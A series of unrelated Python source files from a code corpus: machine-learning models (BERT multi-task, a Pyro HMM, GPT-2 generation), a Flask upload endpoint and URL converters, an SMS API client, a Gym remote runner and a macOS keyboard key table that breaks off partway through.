from dataclasses import dataclass, field
from typing import List, Optional
import torch
import torch.nn as nn
from transformers import BertPreTrainedModel
from src.model.decoder import Decoder
from src.model.encoders.bert import _BertEncoder
from src.model.encoders.ca_mtl_base import CaMtlBaseEncoder
from src.model.encoders.ca_mtl_large import CaMtlLargeEncoder
logger = logging.getLogger(__name__)
@dataclass
class CaMtlArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={
"help": "Path to pretrained model or model identifier from: CA-MTL-base, CA-MTL-large, bert-base-cased "
"bert-base-uncased, bert-large-cased, bert-large-uncased"
}
)
encoder_type: str = field(
default=None,
metadata={
"help": "Identifier of encoder-type to use: CA-MTL-base, CA-MTL-large, bert-base-cased "
"bert-base-uncased, bert-large-cased, bert-large-uncased"
}
)
class CaMtl(BertPreTrainedModel):
def __init__(
self,
config,
model_args,
data_args,
):
super().__init__(config)
self.data_args = data_args
self.bert = self._create_encoder(model_args.encoder_type)
self.decoders = nn.ModuleList()
for task in data_args.tasks:
self.decoders.append(Decoder(config.hidden_size, task))
self.init_weights()
def forward(
self,
input_ids=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
task_id=None,
span_locs=None,
sample_id=None,
):
outputs = self.bert(
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
task_id=task_id,
)
sequence_output, pooled_output = outputs[:2]
loss_list = []
unique_task_ids = torch.unique(task_id)
unique_task_ids_list = (
unique_task_ids.cpu().numpy()
if unique_task_ids.is_cuda
else unique_task_ids.numpy()
)
loss_grouped_per_task = (
torch.zeros_like(task_id[0]).repeat(len(self.data_args.tasks)).float()
)
batch_entropy_per_task = torch.zeros(input_ids.shape[0])
batch_entropy_mean_per_task = torch.zeros(input_ids.shape[0])
max_mean_batch_entropy = None
logits = None
for unique_task_id in unique_task_ids_list:
task_id_filter = task_id == unique_task_id
decoder_id = unique_task_id
logits, current_loss, batch_entropy = self.decoders[decoder_id].forward(
sequence_output[task_id_filter],
pooled_output[task_id_filter],
labels=None if labels is None else labels[task_id_filter],
attention_mask=attention_mask[task_id_filter],
)
batch_entropy_mean = batch_entropy.mean().item()
batch_entropy_per_task[task_id_filter] = batch_entropy
batch_entropy_mean_per_task[task_id_filter] = torch.full_like(
batch_entropy, batch_entropy_mean
)
if (
max_mean_batch_entropy is None
or batch_entropy_mean > max_mean_batch_entropy
):
max_mean_batch_entropy = batch_entropy_mean
if labels is not None:
loss_grouped_per_task[unique_task_id] = current_loss
loss_list.append(current_loss)
outputs = (
(logits,)
+ outputs[2:]
+ (
batch_entropy_per_task,
batch_entropy_mean_per_task,
max_mean_batch_entropy,
)
)
if loss_list:
loss = torch.stack(loss_list)
outputs = (loss.mean(),) + outputs + (loss_grouped_per_task.view(1, -1),)
return outputs
def _create_encoder(self, encoder_type):
if encoder_type == "CA-MTL-large":
return CaMtlLargeEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-base":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-base-uncased":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
elif encoder_type == "CA-MTL-tiny":
return CaMtlBaseEncoder(self.config, data_args=self.data_args)
else:
return _BertEncoder(self.config)
@staticmethod
def get_base_model(model_name_or_path):
if model_name_or_path == "CA-MTL-large":
return "bert-large-cased"
elif model_name_or_path == "CA-MTL-base":
return "bert-base-cased"
elif model_name_or_path == "CA-MTL-base-uncased":
return "bert-base-uncased"
elif model_name_or_path == "CA-MTL-tiny":
return 'huawei-noah/TinyBERT_General_6L_768D'
else:
return model_name_or_path
| 2.296875 | 2 |
src/server.py | dashaomai/wx_social_server | 0 | 12798015 | <gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from flask import Flask, request, redirect, url_for
from writer import parse_sns
UPLOAD_FOLDER = 'uploads'
ALLOWED_EXTENSIONS = set(['json'])
app = Flask(__name__)
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/social/moment', methods=['GET', 'POST'])
def update_file():
if request.method == 'POST':
if 'file' not in request.files:
print('No file part')
return redirect(request.url)
file = request.files['file']
if file.filename == '':
print('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
path = os.path.join(app.config['UPLOAD_FOLDER'], 'exported_sns.json')
file.save(os.path.join(path))
parse_sns(path)
return '<!doctype html><title>File uploaded</title><h1>File uploaded</h1>'
else:
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
'''
app.run(host="0.0.0.0")
| 2.578125 | 3 |
src/setting.py | willyii/CarND-Advanced-Lane-Lines | 0 | 12798016 | <reponame>willyii/CarND-Advanced-Lane-Lines<gh_stars>0
CALIBRATION_PATH = "./param/calibration_param.npz"
| 1.1875 | 1 |
modules/configure/call_server.py | Forcepoint/fp-bd-secure-xmas | 0 | 12798017 | import os
from colorama import Fore, init
# Current file directory details
file = os.path.realpath(__file__)
filedir = os.path.dirname(file)
parentdir = os.path.dirname(filedir)
# Initialise colors for terminal
init()
# Print out header
print(Fore.CYAN + '-' * 13 + Fore.RESET)
print('Call Server')
print(Fore.CYAN + '-' * 13 + Fore.RESET)
# Get variables
print()
print(Fore.CYAN + 'What is the root FQDN for this machine: ' + Fore.RESET, end='')
root_url = input()
print(Fore.CYAN + 'On which port should the call server run: ' + Fore.RESET, end='')
port = input()
# Write out configuration file
print()
print(Fore.CYAN + 'Writing Call Server configuration...' + Fore.RESET)
with open(parentdir + '\\settings.py', 'a+') as f:
f.write('# CALL SERVER SETTINGS\n')
f.write('ROOT_URL=\'%s\'\n' % root_url.rstrip('/').lstrip('http://').lstrip('https://'))
f.write('PORT=%s\n\n' % port)
print()
print(Fore.GREEN + 'Call Server configuration successfully written!' + Fore.RESET)
print()
| 2.5 | 2 |
core/app/notification/out/free_carrier_messaging.py | EmixMaxime/mx-home-security | 2 | 12798018 | <reponame>EmixMaxime/mx-home-security
from urllib import parse
import requests
from notification.models import UserFreeCarrier
class FreeCarrierMessaging:
def send_message(self, credential: UserFreeCarrier, message, *args):
if message is None:
return
data = {
'user': credential.free_user,
'pass': credential.free_password,
'msg': message
}
query = parse.urlencode(data)
url = f'https://smsapi.free-mobile.fr/sendmsg?{query}'
res = requests.get(url)
res.raise_for_status()
# free api
# errorcodes = {400: 'Missing Parameter',
# 402: 'Spammer!',
# 403: 'Access Denied',
# 500: 'Server Down'}
| 2.453125 | 2 |
openstates/openstates-master/openstates/in/utils.py | Jgorsick/Advocacy_Angular | 0 | 12798019 | import requests
def get_with_increasing_timeout(scraper,link,fail=False,kwargs={}):
#if fail is true, we want to throw an error if we can't
#access the page we need
#if it's false, throw a warning and keep going
timeout_length = 2
html = None
while timeout_length < 65 and html is None:
try:
html = scraper.get(link,timeout=timeout_length,**kwargs)
except (requests.exceptions.ConnectTimeout, requests.exceptions.ReadTimeout):
old_length = timeout_length
timeout_length **= 2 #this squares the result. awesome.
scraper.logger.debug("Timed out after {now} seconds, increasing to {next} and trying again".format(now=old_length,next=timeout_length))
else:
return html
if fail:
raise AssertionError("Link failed after waiting over a minute, giving up and failing.")
else:
scraper.logger.warning("Link failed after waiting over a minute, giving up and moving on.")
| 3.328125 | 3 |
src/guess_combinator_test.py | RasPat1/wordle-world-whirl | 0 | 12798020 | import unittest
from filter import Filter
from differ import Differ
from guess_combinator import GuessCombinator
class TestGuessCombinator(unittest.TestCase):
def test_it_exists(self):
self.assertNotEqual(GuessCombinator(), None)
def test_it_returns_a_best_guess(self):
# solution_unknown
corpus = ["abcde", "abcdf", "abcdg", "abcdh", "abcdi", "efghi"]
expected_best_guess_pair = ["abcde", "efghi"]
# I can't construct good examples.
self.assertNotEqual(GuessCombinator.process(
corpus, corpus), None)
if __name__ == '__main__':
unittest.main()
| 3.078125 | 3 |
tapqir/models/hmm.py | gelles-brandeis/tapqir | 2 | 12798021 | # Copyright Contributors to the Tapqir project.
# SPDX-License-Identifier: Apache-2.0
"""
hmm
^^^
"""
import math
from typing import Union
import torch
import torch.distributions.constraints as constraints
from pyro.distributions.hmm import _logmatmulexp
from pyro.ops.indexing import Vindex
from pyroapi import distributions as dist
from pyroapi import handlers, infer, pyro
from torch.nn.functional import one_hot
from tapqir.distributions import KSMOGN, AffineBeta
from tapqir.distributions.util import expand_offtarget, probs_m, probs_theta
from tapqir.models.cosmos import Cosmos
class HMM(Cosmos):
r"""
**Single-Color Hidden Markov Colocalization Model**
.. note::
This model is used for kinetic simulations. Efficient fitting is not yet supported.
**Reference**:
1. <NAME>, <NAME>, <NAME>, Theobald DL.
Bayesian machine learning analysis of single-molecule fluorescence colocalization images.
bioRxiv. 2021 Oct. doi: `10.1101/2021.09.30.462536 <https://doi.org/10.1101/2021.09.30.462536>`_.
:param S: Number of distinct molecular states for the binder molecules.
:param K: Maximum number of spots that can be present in a single image.
:param channels: Number of color channels.
:param device: Computation device (cpu or gpu).
:param dtype: Floating point precision.
:param use_pykeops: Use pykeops as backend to marginalize out offset.
:param vectorized: Vectorize time-dimension.
"""
name = "hmm"
def __init__(
self,
S: int = 1,
K: int = 2,
channels: Union[tuple, list] = (0,),
device: str = "cpu",
dtype: str = "double",
use_pykeops: bool = True,
vectorized: bool = False,
):
self.vectorized = vectorized
super().__init__(S, K, channels, device, dtype, use_pykeops)
self.conv_params = ["-ELBO", "proximity_loc", "gain_loc", "lamda_loc"]
self._global_params = ["gain", "proximity", "lamda", "trans"]
def model(self):
"""
**Generative Model**
"""
# global parameters
gain = pyro.sample("gain", dist.HalfNormal(50))
init = pyro.sample(
"init", dist.Dirichlet(torch.ones(self.S + 1) / (self.S + 1))
)
init = expand_offtarget(init)
trans = pyro.sample(
"trans",
dist.Dirichlet(torch.ones(self.S + 1, self.S + 1) / (self.S + 1)).to_event(
1
),
)
trans = expand_offtarget(trans)
lamda = pyro.sample("lamda", dist.Exponential(1))
proximity = pyro.sample("proximity", dist.Exponential(1))
size = torch.stack(
(
torch.full_like(proximity, 2.0),
(((self.data.P + 1) / (2 * proximity)) ** 2 - 1),
),
dim=-1,
)
# spots
spots = pyro.plate("spots", self.K)
# aoi sites
aois = pyro.plate(
"aois",
self.data.Nt,
subsample=self.n,
subsample_size=self.nbatch_size,
dim=-2,
)
# time frames
frames = (
pyro.vectorized_markov(name="frames", size=self.data.F, dim=-1)
if self.vectorized
else pyro.markov(range(self.data.F))
)
with aois as ndx:
ndx = ndx[:, None]
# background mean and std
background_mean = pyro.sample("background_mean", dist.HalfNormal(1000))
background_std = pyro.sample("background_std", dist.HalfNormal(100))
z_prev = None
for fdx in frames:
if self.vectorized:
fsx, fdx = fdx
else:
fsx = fdx
# fetch data
obs, target_locs, is_ontarget = self.data.fetch(ndx, fdx, self.cdx)
# sample background intensity
background = pyro.sample(
f"background_{fdx}",
dist.Gamma(
(background_mean / background_std) ** 2,
background_mean / background_std ** 2,
),
)
# sample hidden model state (1+S,)
z_probs = (
Vindex(init)[..., :, is_ontarget.long()]
if isinstance(fdx, int) and fdx < 1
else Vindex(trans)[..., z_prev, :, is_ontarget.long()]
)
z_curr = pyro.sample(f"z_{fsx}", dist.Categorical(z_probs))
theta = pyro.sample(
f"theta_{fdx}",
dist.Categorical(
Vindex(probs_theta(self.K, self.device))[
torch.clamp(z_curr, min=0, max=1)
]
),
infer={"enumerate": "parallel"},
)
onehot_theta = one_hot(theta, num_classes=1 + self.K)
ms, heights, widths, xs, ys = [], [], [], [], []
for kdx in spots:
specific = onehot_theta[..., 1 + kdx]
# spot presence
m = pyro.sample(
f"m_{kdx}_{fsx}",
dist.Bernoulli(Vindex(probs_m(lamda, self.K))[..., theta, kdx]),
)
with handlers.mask(mask=m > 0):
# sample spot variables
height = pyro.sample(
f"height_{kdx}_{fsx}",
dist.HalfNormal(10000),
)
width = pyro.sample(
f"width_{kdx}_{fsx}",
AffineBeta(
1.5,
2,
0.75,
2.25,
),
)
x = pyro.sample(
f"x_{kdx}_{fsx}",
AffineBeta(
0,
Vindex(size)[..., specific],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
y = pyro.sample(
f"y_{kdx}_{fsx}",
AffineBeta(
0,
Vindex(size)[..., specific],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
# append
ms.append(m)
heights.append(height)
widths.append(width)
xs.append(x)
ys.append(y)
# observed data
pyro.sample(
f"data_{fsx}",
KSMOGN(
torch.stack(heights, -1),
torch.stack(widths, -1),
torch.stack(xs, -1),
torch.stack(ys, -1),
target_locs,
background,
gain,
self.data.offset.samples,
self.data.offset.logits.to(self.dtype),
self.data.P,
torch.stack(torch.broadcast_tensors(*ms), -1),
self.use_pykeops,
),
obs=obs,
)
z_prev = z_curr
def guide(self):
"""
**Variational Distribution**
"""
# global parameters
pyro.sample(
"gain",
dist.Gamma(
pyro.param("gain_loc") * pyro.param("gain_beta"),
pyro.param("gain_beta"),
),
)
pyro.sample(
"init", dist.Dirichlet(pyro.param("init_mean") * pyro.param("init_size"))
)
pyro.sample(
"trans",
dist.Dirichlet(
pyro.param("trans_mean") * pyro.param("trans_size")
).to_event(1),
)
pyro.sample(
"lamda",
dist.Gamma(
pyro.param("lamda_loc") * pyro.param("lamda_beta"),
pyro.param("lamda_beta"),
),
)
pyro.sample(
"proximity",
AffineBeta(
pyro.param("proximity_loc"),
pyro.param("proximity_size"),
0,
(self.data.P + 1) / math.sqrt(12),
),
)
# spots
spots = pyro.plate("spots", self.K)
# aoi sites
aois = pyro.plate(
"aois",
self.data.Nt,
subsample=self.n,
subsample_size=self.nbatch_size,
dim=-2,
)
# time frames
frames = (
pyro.vectorized_markov(name="frames", size=self.data.F, dim=-1)
if self.vectorized
else pyro.markov(range(self.data.F))
)
with aois as ndx:
ndx = ndx[:, None]
pyro.sample(
"background_mean",
dist.Delta(Vindex(pyro.param("background_mean_loc"))[ndx, 0]),
)
pyro.sample(
"background_std",
dist.Delta(Vindex(pyro.param("background_std_loc"))[ndx, 0]),
)
z_prev = None
for fdx in frames:
if self.vectorized:
fsx, fdx = fdx
else:
fsx = fdx
# sample background intensity
pyro.sample(
f"background_{fsx}",
dist.Gamma(
Vindex(pyro.param("b_loc"))[ndx, fdx]
* Vindex(pyro.param("b_beta"))[ndx, fdx],
Vindex(pyro.param("b_beta"))[ndx, fdx],
),
)
# sample hidden model state (3,1,1,1)
z_probs = (
Vindex(pyro.param("z_trans"))[ndx, fdx, 0]
if isinstance(fdx, int) and fdx < 1
else Vindex(pyro.param("z_trans"))[ndx, fdx, z_prev]
)
z_curr = pyro.sample(
f"z_{fsx}",
dist.Categorical(z_probs),
infer={"enumerate": "parallel"},
)
for kdx in spots:
# spot presence
m_probs = Vindex(pyro.param("m_probs"))[z_curr, kdx, ndx, fdx]
m = pyro.sample(
f"m_{kdx}_{fsx}",
dist.Categorical(m_probs),
infer={"enumerate": "parallel"},
)
with handlers.mask(mask=m > 0):
# sample spot variables
pyro.sample(
f"height_{kdx}_{fsx}",
dist.Gamma(
Vindex(pyro.param("h_loc"))[kdx, ndx, fdx]
* Vindex(pyro.param("h_beta"))[kdx, ndx, fdx],
Vindex(pyro.param("h_beta"))[kdx, ndx, fdx],
),
)
pyro.sample(
f"width_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("w_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("w_size"))[kdx, ndx, fdx],
0.75,
2.25,
),
)
pyro.sample(
f"x_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("x_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("size"))[kdx, ndx, fdx],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
pyro.sample(
f"y_{kdx}_{fsx}",
AffineBeta(
Vindex(pyro.param("y_mean"))[kdx, ndx, fdx],
Vindex(pyro.param("size"))[kdx, ndx, fdx],
-(self.data.P + 1) / 2,
(self.data.P + 1) / 2,
),
)
z_prev = z_curr
def init_parameters(self):
"""
Initialize variational parameters.
"""
device = self.device
data = self.data
pyro.param(
"proximity_loc",
lambda: torch.tensor(0.5, device=device),
constraint=constraints.interval(
0,
(self.data.P + 1) / math.sqrt(12) - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"proximity_size",
lambda: torch.tensor(100, device=device),
constraint=constraints.greater_than(2.0),
)
pyro.param(
"lamda_loc",
lambda: torch.tensor(0.5, device=device),
constraint=constraints.positive,
)
pyro.param(
"lamda_beta",
lambda: torch.tensor(100, device=device),
constraint=constraints.positive,
)
pyro.param(
"init_mean",
lambda: torch.ones(self.S + 1, device=device),
constraint=constraints.simplex,
)
pyro.param(
"init_size",
lambda: torch.tensor(2, device=device),
constraint=constraints.positive,
)
pyro.param(
"trans_mean",
lambda: torch.ones(self.S + 1, self.S + 1, device=device),
constraint=constraints.simplex,
)
pyro.param(
"trans_size",
lambda: torch.full((self.S + 1, 1), 2, device=device),
constraint=constraints.positive,
)
pyro.param(
"gain_loc",
lambda: torch.tensor(5, device=device),
constraint=constraints.positive,
)
pyro.param(
"gain_beta",
lambda: torch.tensor(100, device=device),
constraint=constraints.positive,
)
pyro.param(
"background_mean_loc",
lambda: torch.full(
(data.Nt, 1),
data.median - self.data.offset.mean,
device=device,
),
constraint=constraints.positive,
)
pyro.param(
"background_std_loc",
lambda: torch.ones(data.Nt, 1, device=device),
constraint=constraints.positive,
)
pyro.param(
"b_loc",
lambda: torch.full(
(data.Nt, data.F),
data.median - self.data.offset.mean,
device=device,
),
constraint=constraints.positive,
)
pyro.param(
"b_beta",
lambda: torch.ones(data.Nt, data.F, device=device),
constraint=constraints.positive,
)
pyro.param(
"h_loc",
lambda: torch.full((self.K, data.Nt, data.F), 2000, device=device),
constraint=constraints.positive,
)
pyro.param(
"h_beta",
lambda: torch.full((self.K, data.Nt, data.F), 0.001, device=device),
constraint=constraints.positive,
)
pyro.param(
"w_mean",
lambda: torch.full((self.K, data.Nt, data.F), 1.5, device=device),
constraint=constraints.interval(
0.75 + torch.finfo(self.dtype).eps,
2.25 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"w_size",
lambda: torch.full((self.K, data.Nt, data.F), 100, device=device),
constraint=constraints.greater_than(2.0),
)
pyro.param(
"x_mean",
lambda: torch.zeros(self.K, data.Nt, data.F, device=device),
constraint=constraints.interval(
-(data.P + 1) / 2 + torch.finfo(self.dtype).eps,
(data.P + 1) / 2 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"y_mean",
lambda: torch.zeros(self.K, data.Nt, data.F, device=device),
constraint=constraints.interval(
-(data.P + 1) / 2 + torch.finfo(self.dtype).eps,
(data.P + 1) / 2 - torch.finfo(self.dtype).eps,
),
)
pyro.param(
"size",
lambda: torch.full((self.K, data.Nt, data.F), 200, device=device),
constraint=constraints.greater_than(2.0),
)
# classification
pyro.param(
"z_trans",
lambda: torch.ones(
data.Nt,
data.F,
1 + self.S,
1 + self.S,
device=device,
),
constraint=constraints.simplex,
)
pyro.param(
"m_probs",
lambda: torch.full(
(1 + self.S, self.K, self.data.Nt, self.data.F),
0.5,
device=device,
),
constraint=constraints.unit_interval,
)
def TraceELBO(self, jit=False):
"""
A trace implementation of ELBO-based SVI that supports - exhaustive enumeration over
discrete sample sites, and - local parallel sampling over any sample site in the guide.
"""
if self.vectorized:
return (
infer.JitTraceMarkovEnum_ELBO if jit else infer.TraceMarkovEnum_ELBO
)(max_plate_nesting=2, ignore_jit_warnings=True)
return (infer.JitTraceEnum_ELBO if jit else infer.TraceEnum_ELBO)(
max_plate_nesting=2, ignore_jit_warnings=True
)
@staticmethod
def _sequential_logmatmulexp(logits: torch.Tensor) -> torch.Tensor:
"""
For a tensor ``x`` whose time dimension is -3, computes::
x[..., 0, :, :] @ x[..., 1, :, :] @ ... @ x[..., T-1, :, :]
but does so numerically stably in log space.
"""
batch_shape = logits.shape[:-3]
state_dim = logits.size(-1)
sum_terms = []
# up sweep
while logits.size(-3) > 1:
time = logits.size(-3)
even_time = time // 2 * 2
even_part = logits[..., :even_time, :, :]
x_y = even_part.reshape(
batch_shape + (even_time // 2, 2, state_dim, state_dim)
)
x, y = x_y.unbind(-3)
contracted = _logmatmulexp(x, y)
if time > even_time:
contracted = torch.cat((contracted, logits[..., -1:, :, :]), dim=-3)
sum_terms.append(logits)
logits = contracted
else:
sum_terms.append(logits)
# handle root case
sum_term = sum_terms.pop()
left_term = HMM._contraction_identity(sum_term)
# down sweep
while sum_terms:
sum_term = sum_terms.pop()
new_left_term = HMM._contraction_identity(sum_term)
time = sum_term.size(-3)
even_time = time // 2 * 2
if time > even_time:
new_left_term[..., time - 1 : time, :, :] = left_term[
..., even_time // 2 : even_time // 2 + 1, :, :
]
left_term = left_term[..., : even_time // 2, :, :]
left_sum = sum_term[..., :even_time:2, :, :]
left_sum_and_term = _logmatmulexp(left_term, left_sum)
new_left_term[..., :even_time:2, :, :] = left_term
new_left_term[..., 1:even_time:2, :, :] = left_sum_and_term
left_term = new_left_term
else:
alphas = _logmatmulexp(left_term, sum_term)
return alphas
@staticmethod
def _contraction_identity(logits: torch.Tensor) -> torch.Tensor:
batch_shape = logits.shape[:-2]
state_dim = logits.size(-1)
result = torch.eye(state_dim).log()
result = result.reshape((1,) * len(batch_shape) + (state_dim, state_dim))
result = result.repeat(batch_shape + (1, 1))
return result
@property
def z_probs(self) -> torch.Tensor:
r"""
Probability of there being a target-specific spot :math:`p(z=1)`
"""
result = self._sequential_logmatmulexp(pyro.param("z_trans").data.log())
return result[..., 0, 1].exp()
@property
def pspecific(self) -> torch.Tensor:
r"""
Probability of there being a target-specific spot :math:`p(\mathsf{specific})`
"""
return self.z_probs
@property
def m_probs(self) -> torch.Tensor:
r"""
Posterior spot presence probability :math:`q(m=1)`.
"""
return torch.einsum(
"knf,nf->knf",
pyro.param("m_probs").data[1],
self.pspecific,
)
| 1.78125 | 2 |
ude_gym_bridge/gym_env_remote_runner.py | aws-deepracer/ude-gym-bridge | 1 | 12798022 | <reponame>aws-deepracer/ude-gym-bridge
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
# You may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
#################################################################################
"""A class for Gym Environment."""
from typing import Optional, List, Tuple, Union, Any, Iterable
from ude import (
UDEEnvironment,
UDEServer,
UDEStepInvokeType,
Compression, ServerCredentials
)
from ude_gym_bridge.gym_environment_adapter import GymEnvironmentAdapter
class GymEnvRemoteRunner(object):
"""
Gym Environment
"""
def __init__(self,
env_name: str = "CartPole-v0",
agent_name: str = "agent0",
render: bool = True,
step_invoke_type: UDEStepInvokeType = UDEStepInvokeType.WAIT_FOREVER,
step_invoke_period: Union[int, float] = 120.0,
port: Optional[int] = None,
options: Optional[List[Tuple[str, Any]]] = None,
compression: Compression = Compression.NoCompression,
credentials: Optional[Union[ServerCredentials, Iterable[str], Iterable[bytes]]] = None,
auth_key: Optional[str] = None,
timeout_wait: Union[int, float] = 60.0,
**kwargs):
"""
Args:
env_name (str): OpenAI Gym Environment name.
agent_name (str): Name of agent to use.
render (bool): the flag to render OpenAI Gym environment or not.
step_invoke_type (const.UDEStepInvokeType): step invoke type (WAIT_FOREVER vs PERIODIC)
step_invoke_period (Union[int, float]): step invoke period (used only with PERIODIC step_invoke_type)
port (Optional[int]): Port to use for UDE Server (default: 3003)
options (Optional[List[Tuple[str, Any]]]): An optional list of key-value pairs
(:term:`channel_arguments` in gRPC runtime)
to configure the channel.
compression (Compression) = channel compression type (default: NoCompression)
credentials (Optional[Union[ServerCredentials, Iterable[str], Iterable[bytes]]]): grpc.ServerCredentials,
the path to certificate private key and body/chain file, or bytes of the certificate private
key and body/chain to use with an SSL-enabled Channel.
auth_key (Optional[str]): channel authentication key (only applied when credentials are provided).
timeout_wait (Union[int, float]): the maximum wait time to respond step request to UDE clients.
kwargs: Arbitrary keyword arguments for grpc.server
"""
self._adapter = GymEnvironmentAdapter(env_name=env_name,
agent_name=agent_name,
render=render)
self._ude_env = UDEEnvironment(ude_env_adapter=self._adapter)
self._ude_server = UDEServer(ude_env=self._ude_env,
step_invoke_type=step_invoke_type,
step_invoke_period=step_invoke_period,
port=port,
options=options,
compression=compression,
credentials=credentials,
auth_key=auth_key,
timeout_wait=timeout_wait,
**kwargs)
def start(self) -> None:
"""
Start UDE Server.
"""
self._ude_server.start()
def stop(self) -> None:
"""
Stop UDE Server.
"""
self._ude_server.close()
def spin(self) -> None:
"""
Spin till UDE Server terminates.
"""
self._ude_server.spin()
def main():
gym_env = GymEnvRemoteRunner()
gym_env.start()
gym_env.spin()
if __name__ == '__main__':
main()
| 2.015625 | 2 |
my_credentials/config.py | eurodatacube/edc-my-credentials | 0 | 12798023 | # no config for now
| 1.109375 | 1 |
flask_occam/converters.py | bprinty/Flask-Occam | 2 | 12798024 |
# imports
# -------
import re
from werkzeug.routing import BaseConverter
from werkzeug.exceptions import NotFound
# helpers
# -------
MODELS = dict()
def class_registry(cls):
"""
Function for dynamically getting class
registry dictionary from specified model.
"""
try:
return dict(cls._sa_registry._class_registry)
except:
return dict(cls._decl_class_registry)
return
def gather_models():
"""
Inspect sqlalchemy models from current context and set global
dictionary to be used in url conversion.
"""
global MODELS
from flask import current_app, has_app_context
if not has_app_context():
return
if 'sqlalchemy' not in current_app.extensions:
return
# inspect current models and add to map
db = current_app.extensions['sqlalchemy'].db
registry = class_registry(db.Model)
for cls in registry.values():
if isinstance(cls, type) and issubclass(cls, db.Model):
# class name
MODELS[cls.__name__] = cls
# lowercase name
MODELS[cls.__name__.lower()] = cls
# snake_case name
words = re.findall(r'([A-Z][0-9a-z]+)', cls.__name__)
if len(words) > 1:
alias = '_'.join(map(lambda x: x.lower(), words))
MODELS[alias] = cls
return
# converters
# ----------
class ModelConverter(BaseConverter):
"""
For url inputs containing a model identifier, look
up the model and return the object.
This method simplifies a lot of the boilerplate needed
to do model look ups in REST apis.
Examples:
.. code-block:: python
@app.route('/users/<id(User):user>')
def get_user(user):
return jsonify(user.json())
In addition, this class can be inherited and used
for other custom parameter url converters. For instance,
here is how you might use it to create a name converter:
.. code-block:: python
class NameConverter(ModelConverter):
__param__ = 'name'
app.url_map.converters['name'] = NameConverter
# ... handlers ...
@app.route('/users/<name(User):user>')
def get_user(user):
return jsonify(user.json())
"""
__param__ = 'id'
def __init__(self, map, model):
self.map = map
self.model = model
return
@property
def models(self):
global MODELS
if not MODELS:
gather_models()
return MODELS
def to_python(self, value):
mapper = self.models
# make sure model exists
if self.model not in mapper:
raise AssertionError(
'Specified model `{}` in url converter '
'not part of application models.'.format(self.model))
# set up class for conversion
cls = mapper[self.model]
# search for the object
model = cls.get(**{self.__param__: value})
if model is None:
raise NotFound
return model
def to_url(self, value):
return super(ModelConverter, self).to_url(getattr(value, self.__param__))
| 2.375 | 2 |
baselines/tm_generation/h_test_model.py | lhf-labs/tm-dataset | 4 | 12798025 | import os
import json
import torch
from transformers import GPT2LMHeadModel, GPT2Tokenizer, AutoTokenizer, GPT2Config
PATH = './models'
OUTPUT_PATH = './output/'
if __name__ == '__main__':
#tokenizer = AutoTokenizer.from_pretrained("./models")
# add the EOS token as PAD token to avoid warnings
#tokenizer = GPT2Tokenizer(config=GPT2Config(**json.load(open(os.path.join(PATH, 'config.json')))))
model = GPT2LMHeadModel(config=GPT2Config(**json.load(open(os.path.join(PATH, 'config.json')))))
#input_ids = tokenizer.encode('', return_tensors='tf')
greedy_output = model.generate(torch.zeros((10, 1), dtype=torch.int), max_length=1024+1, min_length=1024+1)
print(list(greedy_output.data[0].numpy()))
for file in ('train', 'valid', 'test'):
with open(os.path.join(OUTPUT_PATH, f'{file}.txt'), 'w') as fout:
data = greedy_output.data
for i in range(len(data)):
elements = list(data[i].numpy())[1:]
for idx, element in enumerate(elements):
fout.write(str(int(element)))
if idx < len(elements):
fout.write(" ")
fout.write('\n')
| 2.5 | 2 |
Dependencies/pykeyboard/mac.py | CamelBackNotation/hackdfw | 1 | 12798026 | #Copyright 2013 <NAME>
#
#This program is free software: you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation, either version 3 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
import time
import Quartz
from AppKit import NSEvent
from .base import PyKeyboardMeta, PyKeyboardEventMeta
# Taken from events.h
# /System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/Headers/Events.h
character_translate_table = {
'a': 0x00,
's': 0x01,
'd': 0x02,
'f': 0x03,
'h': 0x04,
'g': 0x05,
'z': 0x06,
'x': 0x07,
'c': 0x08,
'v': 0x09,
'b': 0x0b,
'q': 0x0c,
'w': 0x0d,
'e': 0x0e,
'r': 0x0f,
'y': 0x10,
't': 0x11,
'1': 0x12,
'2': 0x13,
'3': 0x14,
'4': 0x15,
'6': 0x16,
'5': 0x17,
'=': 0x18,
'9': 0x19,
'7': 0x1a,
'-': 0x1b,
